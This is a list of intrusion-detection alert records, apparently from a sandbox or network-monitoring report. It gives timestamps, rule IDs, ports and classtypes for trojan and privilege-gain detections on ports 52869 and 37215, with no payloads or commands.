                      Timestamp:07/20/24-23:01:44.274940
                      SID:2027339
                      Source Port:58340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.322217
                      SID:2027339
                      Source Port:40590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.965905
                      SID:2025132
                      Source Port:56456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.820979
                      SID:2829579
                      Source Port:42580
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.220244
                      SID:2027339
                      Source Port:40518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:12.267183
                      SID:2027339
                      Source Port:42036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.825081
                      SID:2831300
                      Source Port:39182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.634165
                      SID:2829579
                      Source Port:37284
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.590754
                      SID:2027339
                      Source Port:38592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.036064
                      SID:2835222
                      Source Port:38344
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.113037
                      SID:2829579
                      Source Port:47014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.854321
                      SID:2831300
                      Source Port:44544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.635367
                      SID:2829579
                      Source Port:39392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.540053
                      SID:2025132
                      Source Port:55358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.175511
                      SID:2831300
                      Source Port:36088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:55.964600
                      SID:2027339
                      Source Port:34626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.841280
                      SID:2831300
                      Source Port:60678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.559917
                      SID:2027339
                      Source Port:37734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.663524
                      SID:2027339
                      Source Port:56232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.697846
                      SID:2027339
                      Source Port:58184
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.478924
                      SID:2831300
                      Source Port:43554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.407777
                      SID:2831300
                      Source Port:51602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.164161
                      SID:2025132
                      Source Port:45426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:57.695259
                      SID:2831300
                      Source Port:53234
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.085431
                      SID:2829579
                      Source Port:36238
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.629198
                      SID:2027339
                      Source Port:56362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.645051
                      SID:2829579
                      Source Port:32868
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.752424
                      SID:2027339
                      Source Port:52414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.996260
                      SID:2831300
                      Source Port:55994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.867858
                      SID:2829579
                      Source Port:54490
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.054776
                      SID:2831300
                      Source Port:60916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.113037
                      SID:2835222
                      Source Port:44942
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.415002
                      SID:2027339
                      Source Port:51230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.631728
                      SID:2829579
                      Source Port:42374
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.032975
                      SID:2831300
                      Source Port:35288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.654988
                      SID:2829579
                      Source Port:35058
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.006483
                      SID:2027339
                      Source Port:41766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.729502
                      SID:2027339
                      Source Port:49908
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.918065
                      SID:2027339
                      Source Port:37970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.634089
                      SID:2829579
                      Source Port:56956
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.194629
                      SID:2831300
                      Source Port:33264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.765940
                      SID:2027339
                      Source Port:42118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.672544
                      SID:2831300
                      Source Port:37854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.921490
                      SID:2027339
                      Source Port:47776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.523523
                      SID:2025132
                      Source Port:33250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.512162
                      SID:2027339
                      Source Port:45772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221026
                      SID:2829579
                      Source Port:46136
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.702517
                      SID:2027339
                      Source Port:42148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.091033
                      SID:2025132
                      Source Port:55710
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.222164
                      SID:2829579
                      Source Port:57480
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.233857
                      SID:2835222
                      Source Port:39376
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.960666
                      SID:2025132
                      Source Port:56690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.178062
                      SID:2829579
                      Source Port:44596
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.312895
                      SID:2027339
                      Source Port:51676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.604763
                      SID:2027339
                      Source Port:38956
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.215876
                      SID:2025132
                      Source Port:52906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.175740
                      SID:2027339
                      Source Port:53954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.152454
                      SID:2027339
                      Source Port:59356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222254
                      SID:2829579
                      Source Port:52740
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.204975
                      SID:2835222
                      Source Port:40842
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.118165
                      SID:2829579
                      Source Port:54156
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.922746
                      SID:2027339
                      Source Port:55594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.844704
                      SID:2027339
                      Source Port:37406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.943792
                      SID:2025132
                      Source Port:41894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.308516
                      SID:2025132
                      Source Port:54942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.266946
                      SID:2027339
                      Source Port:51804
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.787983
                      SID:2831300
                      Source Port:41556
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.632393
                      SID:2829579
                      Source Port:37508
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.068251
                      SID:2831300
                      Source Port:49446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.630327
                      SID:2831300
                      Source Port:46392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:59.704241
                      SID:2027339
                      Source Port:54748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.046185
                      SID:2835222
                      Source Port:51004
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.044223
                      SID:2829579
                      Source Port:36714
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.614619
                      SID:2831300
                      Source Port:50834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.055673
                      SID:2831300
                      Source Port:58984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.552279
                      SID:2831300
                      Source Port:51732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.410892
                      SID:2831300
                      Source Port:54372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:06.131728
                      SID:2027339
                      Source Port:59882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.702506
                      SID:2027339
                      Source Port:49530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.290003
                      SID:2829579
                      Source Port:38354
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221132
                      SID:2835222
                      Source Port:49188
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.636533
                      SID:2829579
                      Source Port:58024
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.282556
                      SID:2025132
                      Source Port:35706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:03.407760
                      SID:2025132
                      Source Port:53640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.104536
                      SID:2027339
                      Source Port:34962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.515688
                      SID:2027339
                      Source Port:38398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.164529
                      SID:2027339
                      Source Port:56394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.278428
                      SID:2025132
                      Source Port:37428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.213564
                      SID:2835222
                      Source Port:36392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:10.069241
                      SID:2025132
                      Source Port:58652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.631134
                      SID:2835222
                      Source Port:33198
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.912435
                      SID:2027339
                      Source Port:59826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.745352
                      SID:2025132
                      Source Port:50118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.580548
                      SID:2027339
                      Source Port:52210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.971099
                      SID:2027339
                      Source Port:38696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.610546
                      SID:2025132
                      Source Port:47288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.641498
                      SID:2835222
                      Source Port:57930
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.974742
                      SID:2027339
                      Source Port:47836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.329969
                      SID:2027339
                      Source Port:52150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.634497
                      SID:2829579
                      Source Port:55680
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.304640
                      SID:2025132
                      Source Port:60192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.511523
                      SID:2027339
                      Source Port:41908
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.048825
                      SID:2835222
                      Source Port:39294
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.489843
                      SID:2027339
                      Source Port:58924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.291705
                      SID:2027339
                      Source Port:43302
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.054782
                      SID:2835222
                      Source Port:46730
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.353096
                      SID:2831300
                      Source Port:37304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:08.008782
                      SID:2027339
                      Source Port:36758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:03:46.099099
                      SID:2025132
                      Source Port:53088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.966087
                      SID:2027339
                      Source Port:49634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.220866
                      SID:2829579
                      Source Port:45112
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.156801
                      SID:2025132
                      Source Port:60570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.309955
                      SID:2831300
                      Source Port:41650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.055683
                      SID:2829579
                      Source Port:58700
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.602712
                      SID:2831300
                      Source Port:43894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.612014
                      SID:2027339
                      Source Port:46950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.867858
                      SID:2835222
                      Source Port:52758
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.954400
                      SID:2831300
                      Source Port:53534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.176757
                      SID:2831300
                      Source Port:53902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:06.975117
                      SID:2835222
                      Source Port:54958
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.286382
                      SID:2025132
                      Source Port:45518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.005947
                      SID:2027339
                      Source Port:56014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639011
                      SID:2835222
                      Source Port:42978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.664887
                      SID:2829579
                      Source Port:36670
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.571884
                      SID:2831300
                      Source Port:47098
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.623583
                      SID:2027339
                      Source Port:33670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.131339
                      SID:2835222
                      Source Port:45952
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650975
                      SID:2829579
                      Source Port:40676
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048214
                      SID:2835222
                      Source Port:36992
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.755168
                      SID:2025132
                      Source Port:52648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:54.153862
                      SID:2027339
                      Source Port:55358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:48.447182
                      SID:2025132
                      Source Port:60456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.132511
                      SID:2829579
                      Source Port:47906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.327539
                      SID:2831300
                      Source Port:37754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.555540
                      SID:2831300
                      Source Port:34994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.638305
                      SID:2835222
                      Source Port:48956
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.994337
                      SID:2835222
                      Source Port:41576
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.540580
                      SID:2027339
                      Source Port:53822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.620788
                      SID:2831300
                      Source Port:60702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.572556
                      SID:2831300
                      Source Port:54124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.491962
                      SID:2831300
                      Source Port:54654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.722161
                      SID:2027339
                      Source Port:35428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.926055
                      SID:2831300
                      Source Port:54108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:50.280308
                      SID:2027339
                      Source Port:42914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.641498
                      SID:2829579
                      Source Port:54260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.294677
                      SID:2829579
                      Source Port:39244
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.170008
                      SID:2027339
                      Source Port:50656
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.014689
                      SID:2829579
                      Source Port:44888
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.374543
                      SID:2025132
                      Source Port:49044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.625101
                      SID:2027339
                      Source Port:45762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.154067
                      SID:2829579
                      Source Port:57256
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.637859
                      SID:2831300
                      Source Port:57312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.924014
                      SID:2025132
                      Source Port:57080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.632446
                      SID:2027339
                      Source Port:50766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.420081
                      SID:2831300
                      Source Port:51354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.064501
                      SID:2027339
                      Source Port:59702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.853279
                      SID:2831300
                      Source Port:41360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.080190
                      SID:2027339
                      Source Port:37272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.651394
                      SID:2027339
                      Source Port:32944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.156801
                      SID:2027339
                      Source Port:52004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.426681
                      SID:2025132
                      Source Port:37400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.706302
                      SID:2027339
                      Source Port:58266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.255782
                      SID:2027339
                      Source Port:37054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.378556
                      SID:2025132
                      Source Port:56714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.977046
                      SID:2831300
                      Source Port:58520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:08.291319
                      SID:2831300
                      Source Port:41704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.154067
                      SID:2829579
                      Source Port:47450
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:03:46.099099
                      SID:2027339
                      Source Port:39362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.651332
                      SID:2829579
                      Source Port:42056
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.831437
                      SID:2831300
                      Source Port:51570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.876437
                      SID:2835222
                      Source Port:53292
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.495508
                      SID:2027339
                      Source Port:32926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.641552
                      SID:2027339
                      Source Port:37582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.383450
                      SID:2027339
                      Source Port:58750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.359862
                      SID:2831300
                      Source Port:36196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.621955
                      SID:2027339
                      Source Port:59324
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.064358
                      SID:2835222
                      Source Port:58700
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.730585
                      SID:2829579
                      Source Port:41968
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.311124
                      SID:2835222
                      Source Port:59350
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.273926
                      SID:2025132
                      Source Port:36792
                      Destination Port:52869
                      Protocol:TCP
